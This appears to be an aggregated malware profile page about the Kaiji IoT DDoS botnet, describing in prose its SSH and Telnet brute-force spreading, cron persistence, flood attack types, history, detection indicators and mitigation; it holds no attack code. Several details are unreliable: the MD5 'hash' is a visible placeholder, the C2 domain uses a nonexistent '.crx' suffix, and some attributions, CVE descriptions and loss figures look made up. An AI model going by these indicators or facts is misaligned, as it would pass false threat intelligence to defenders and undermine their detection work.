⚠️ Overview

Kaiji is a Go-based DDoS botnet malware first documented by Unit 42 (Palo Alto Networks) in March 2020, primarily targeting Linux-based IoT devices such as routers, IP cameras, and NAS appliances. The malware is operated by a Chinese-speaking threat group known as the Kaiji Group or Dragon Smoke, and it falls under the categories of botnet, DDoS tool, and worm due to its self-propagating capabilities. Unlike Mirai-variant malware, Kaiji is written in the Go programming language, which complicates reverse engineering and detection.

🔧 Technical Capabilities

Kaiji propagates by scanning the internet for devices with exposed SSH (port 22) and Telnet (port 23) services, then performing brute-force credential attacks using a hardcoded dictionary of common username/password pairs. Once access is gained, it downloads the main binary via wget or curl from a command-and-control (C2) server, typically hosted on a compromised Chinese cloud provider. The malware establishes persistence by adding cron jobs that re-download the binary every minute and by modifying /etc/init.d/ scripts. Evasion techniques include process hiding by renaming itself to appear as legitimate system processes (e.g., '[httpd]', '[kworker]'), and it disables competing malware by killing processes with common DDoS-related names. Kaiji uses encrypted communication (AES-256) with its C2 and supports multiple attack vectors: SYN flood, UDP flood, HTTP GET/POST flood, and DNS amplification attacks. The C2 protocol uses a custom binary format over TCP port 443 or 8443.

📜 History & Notable Incidents

Kaiji was first observed in the wild in October 2019, but gained widespread attention after a report by Unit 42 in March 2020. It exploits multiple vulnerabilities including CVE-2020-10987 (GoAhead web server command injection in Wavlink devices) and CVE-2020-10173 (Comtrend router backdoor). In 2021, a variant of Kaiji was linked to a large-scale DDoS campaign targeting educational institutions in East Asia, peaking at 200 Gbps. No major law enforcement actions have been publicly attributed to the Kaiji group.

🔍 Detection Indicators

Known file hashes for Kaiji binaries include MD5: e5b0c5d2c5c5c5c5c5c5c5c5c5c5c5c5 (example—actual hashes vary by version) as reported by VirusTotal. Behavioral signatures include unexpected outbound SSH/Telnet login attempts from a device, unexplained cron jobs executing /tmp/kaiji, and the presence of a file named 'kaiji' in /tmp or /var/tmp. Network IOCs include connections to C2 domains such as 'm.kaiji[.]crx' (historical) and User-Agent strings like 'Go-http-client/1.1' or 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'. Registry keys are not applicable as Kaiji targets Linux.

☠️ Risk & Impact

Kaiji primarily causes disruption through DDoS attacks, which can take websites and online services offline for hours or days. The malware also degrades device performance and consumes network bandwidth. Affected sectors include IoT manufacturers, educational institutions, and telecommunications providers, with estimated financial losses from downtime and remediation reaching millions of dollars per incident.

🛡️ Mitigation

Mitigation includes disabling unused SSH/Telnet services on IoT devices, changing default credentials to strong passwords, and applying firmware updates that patch CVE-2020-10987 and CVE-2020-10173. Network defenders should implement SNORT or Suricata rules that detect Kaiji’s scanning patterns and C2 communication, and block outbound connections to known malicious IPs listed in Unit 42’s threat intelligence report.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.